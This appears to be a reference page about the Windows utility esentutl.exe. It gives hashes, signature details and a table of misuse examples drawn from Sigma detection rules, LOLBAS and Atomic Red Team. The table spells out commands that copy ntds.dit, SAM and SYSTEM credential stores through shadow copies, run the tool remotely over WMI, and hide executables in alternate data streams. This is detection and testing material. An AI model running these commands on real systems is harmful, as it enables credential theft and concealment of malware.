esentutl.exe

  • File Path: C:\Windows\system32\esentutl.exe
  • Description: Extensible Storage Engine Utilities for Microsoft(R) Windows(R)

Hashes

Type Hash
MD5 D4CD32ECE6D3DC2F2B32A45F828078DE
SHA1 3FCF5E1BEB126A3EF8E0C1C2DAEBA18DB3554A98
SHA256 6363FBBDB2E8AA68E11D12CF20EE008A86517D93BA155B1A32B5DC9A7AF61876
SHA384 AEAF14AC9AF593695E901839D8C500F2D7FF232674C2618B774B886693493293675C50D7039B5CDEC7334F6082CE8115
SHA512 8F5EC082873369D4C9CD46F63676EFACDB2A0C720A9E542986003E4F8179DD673BD04F02E52F964ED64A8C7E99374FAC582B314690D934DFAA1588845A07AD9C
SSDEEP 6144:Y4BpxWW2iWcKTBxdw8zbYsqplR2JduRFWG0KI3RVY2:xnxWW29FwMbyplR2dumG07hV

Runtime Data

Child Processes:

conhost.exe

Signature

  • Status: Signature verified.
  • Serial: 3300000266BD1580EFA75CD6D3000000000266
  • Thumbprint: A4341B9FD50FB9964283220A36A1EF6F6FAA7840
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: esentutl.exe
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.14393.2999 (rs1_release_inmarket.190520-1518)
  • Product Version: 10.0.14393.2999
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.

Possible Misuse

The following table contains possible examples of esentutl.exe being misused. While esentutl.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma sysmon_suspicious_remote_thread.yml - '\esentutl.exe' DRL 1.0
sigma win_susp_esentutl_activity.yml title: Suspicious Esentutl Use DRL 1.0
sigma win_susp_esentutl_activity.yml description: Detects flags often used with the LOLBAS Esentutl for malicious activity. It could be used in rare cases by administrators to access locked files or during maintenance. DRL 1.0
sigma win_susp_vssadmin_ntds_activity.yml - https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/ DRL 1.0
sigma win_susp_vssadmin_ntds_activity.yml - esentutl.exe /y /vss *\ntds.dit* DRL 1.0
sigma win_susp_vssadmin_ntds_activity.yml - esentutl.exe /y /vss *\SAM DRL 1.0
sigma win_susp_vssadmin_ntds_activity.yml - esentutl.exe /y /vss *\SYSTEM DRL 1.0
sigma proc_creation_win_alternate_data_streams.yml - 'esentutl ' DRL 1.0
sigma proc_creation_win_copying_sensitive_files_with_credential_data.yml - https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/ DRL 1.0
sigma proc_creation_win_copying_sensitive_files_with_credential_data.yml - Image\|endswith: '\esentutl.exe' DRL 1.0
sigma proc_creation_win_esentutl_webcache.yml title: Esentutl Steals Browser Information DRL 1.0
sigma proc_creation_win_esentutl_webcache.yml description: One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe DRL 1.0
sigma proc_creation_win_esentutl_webcache.yml Image\|endswith: \esentutl.exe DRL 1.0
sigma proc_creation_win_susp_esentutl_params.yml title: Esentutl Gather Credentials DRL 1.0
sigma proc_creation_win_susp_esentutl_params.yml description: Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab. DRL 1.0
sigma proc_creation_win_susp_esentutl_params.yml - 'esentutl' DRL 1.0
sigma registry_event_esentutl_volume_shadow_copy_service_keys.yml title: Esentutl Volume Shadow Copy Service Keys DRL 1.0
sigma registry_event_esentutl_volume_shadow_copy_service_keys.yml description: Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\System\\CurrentControlSet\\Services\\VSS\\Diag\\VolSnap\\Volume are captured. DRL 1.0
sigma registry_event_esentutl_volume_shadow_copy_service_keys.yml Image\|endswith: 'esentutl.exe' # limit esentutl as in references, too many FP to filter DRL 1.0
LOLBAS Esentutl.yml Name: Esentutl.exe  
LOLBAS Esentutl.yml - Command: esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o  
LOLBAS Esentutl.yml - Command: esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o  
LOLBAS Esentutl.yml - Command: esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o  
LOLBAS Esentutl.yml - Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o  
LOLBAS Esentutl.yml - Command: esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o  
LOLBAS Esentutl.yml - Command: esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit  
LOLBAS Esentutl.yml - Path: C:\Windows\System32\esentutl.exe  
LOLBAS Esentutl.yml - Path: C:\Windows\SysWOW64\esentutl.exe  
LOLBAS Esentutl.yml - Link: https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/  
atomic-red-team index.md - Atomic Test #6: Create Volume Shadow Copy remotely (WMI) with esentutl [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #3: esentutl.exe SAM copy [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #6: Create Volume Shadow Copy remotely (WMI) with esentutl [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #3: esentutl.exe SAM copy [windows] MIT License. © 2018 Red Canary
atomic-red-team T1003.002.md - Atomic Test #3 - esentutl.exe SAM copy MIT License. © 2018 Red Canary
atomic-red-team T1003.002.md ## Atomic Test #3 - esentutl.exe SAM copy MIT License. © 2018 Red Canary
atomic-red-team T1003.002.md Copy the SAM hive using the esentutl.exe utility MIT License. © 2018 Red Canary
atomic-red-team T1003.002.md esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name} MIT License. © 2018 Red Canary
atomic-red-team T1003.003.md - Atomic Test #6 - Create Volume Shadow Copy remotely (WMI) with esentutl MIT License. © 2018 Red Canary
atomic-red-team T1003.003.md ## Atomic Test #6 - Create Volume Shadow Copy remotely (WMI) with esentutl MIT License. © 2018 Red Canary
atomic-red-team T1003.003.md The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy created with esentutl. MIT License. © 2018 Red Canary
atomic-red-team T1003.003.md wmic /node:”#{target_host}” process call create “cmd.exe /c esentutl.exe /y /vss #{source_path} /d #{target_path}” MIT License. © 2018 Red Canary
atomic-red-team T1564.004.md esentutl.exe /y #{path}\autoruns.exe /d #{path}\file.txt:autoruns.exe /o MIT License. © 2018 Red Canary

MIT License. Copyright (c) 2020-2021 Strontic.